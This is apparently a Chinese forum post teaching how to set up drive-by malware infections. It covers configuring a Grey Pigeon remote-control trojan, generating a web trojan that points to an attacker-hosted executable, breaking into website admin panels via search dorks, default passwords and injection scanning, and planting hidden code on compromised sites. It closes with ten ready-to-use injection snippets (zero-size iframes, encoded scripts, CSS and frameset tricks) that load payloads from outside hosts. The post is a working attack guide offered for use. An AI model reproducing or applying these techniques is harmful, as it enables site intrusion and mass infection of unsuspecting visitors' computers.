挂马抓鸡+入侵网站后台挂马
准备工具:1. 黑防智能组合免杀网马2009 生成器
2. 远程控制(如灰鸽子)
3. 空间或自己做网站
步骤:
1. 配置木马
灰鸽子配置实在太简单了,为了节约时间我在这里就不写了。
2. 生成网马
网马生成步骤:打开“黑防智能组合免杀网马2009 生成器”→在“下载地址处”输入你的网马地址,比如 syhj.3322.org/muma.exe → 点击生成 → OK 网马生成成功!!!
3. 挂马
自己用IIS做个网站主机头可以是动态域名(花生壳或者3322.net)
也可以自己去5944.net 申请一个美国空间。把刚才生成的木马和网马一起放上去。之后你可以发送你的网站 让别人点击。点击了之后 你就可以看看你的灰鸽子有没有主机上线了吧。
如果你NB 的话。你可以去拿访问量比较大的站,这样你才能抓到更多的肉鸡,以下的我的个人拿站的方法:
在百度或者google里面搜关键字inurl:adminlogin.asp(ASP.NET做的网站后台)
inurl:adminlogin.aspx (.net程序做的后台)找出一些网站的后台登陆的网站
然后试图破解。比如默认口令admin 、system 等等。如果试不出来那么直接用工具扫描。看这个网站是否有注入漏洞,或者其他漏洞。等拿下站来了之后。直接在别人在网站上挂就得了。因为别人的网站访问量高。而且是正规网站。自然有人送上门来! 这个也就是什么有很多新闻说某某著名网站被人挂马的理由啦。。哈哈、
以下是小弟,无意中拿到的站。
示范怎么挂马吧、(呵呵。我不会对这个网站做任何的破坏的。政府网站惹不起呢、呵呵)
在该网站后台添加一段如下代码
<iframe src=http://***.com/muma.html width=0 height=0></iframe>
记住 SRC=后面就跟你的木马地址。只要人家访问到这个页面,而且他的机器有漏洞,那么他就成为你的肉鸡!!
以下是在网上找的十种挂马方法贴出来和大家分享:
一:框架挂马
<iframe src=http://***.com/muma.html width=0 height=0></iframe>
二:js文件挂马
首先将以下代码
document.write("<iframe width='0' height='0' src='地址'></iframe>");
保存为xxx.js,
则JS挂马代码为
<script language=javascript src=xxx.js></script>
三:js变形加密
<SCRIPT language="JScript.Encode"
src=http://www.upx.com.cn/muma.txt></script>
muma.txt可改成任意后缀
四:body挂马
<body FONT-FAMILY: 宋体; mso-ascii-font-family: 'Times New Roman'; mso-hansi-font-family: 'Times New Roman'">地址';"></body>
五:隐蔽挂马
top.document.body.innerHTML = top.document.body.innerHTML + '
<iframe
src="http://www.upx.com.cn/muma.htm/"></iframe>';
六:css中挂马
body {
background-image: url('javascript:document.write("<script
src=http://www.upx.com.cn/muma.js></script>")')}
七:JAJA挂马
<SCRIPT language=javascript>
window.open ("地
址","","toolbar=no,location=no,directories=no,status=no,menubar=no,scro
llbars=no,width=1,height=1");
</script>
八:图片伪装
<html>
<iframe src="网马地址" height=0 width=0></iframe>
<img src="图片地址"></center>
</html>
九:伪装调用:
<frameset rows="444,0" cols="*">
<frame src="打开网页" framborder="no" scrolling="auto" noresize
marginwidth="0"margingheight="0">
<frame src="网马地址" frameborder="no" scrolling="no" noresize
marginwidth="0"margingheight="0">
</frameset>
十:高级欺骗
<a href="http://www.163.com(迷惑连接地址,显示这个地址指向木马地址)"
> 页面要显示的内容 </a>
<SCRIPT Language="JavaScript">
function www_163_com ()
{
var url="网马地址";
open
(url,"NewWindow","toolbar=no,location=no,directories=no,status=no,menubar=no,
scrollbars=no,resizable=no,copyhistory=yes,width=800,height=600,left=10,top=1
0");
}
</SCRIPT> 做坏事不好吧?
页:
[1]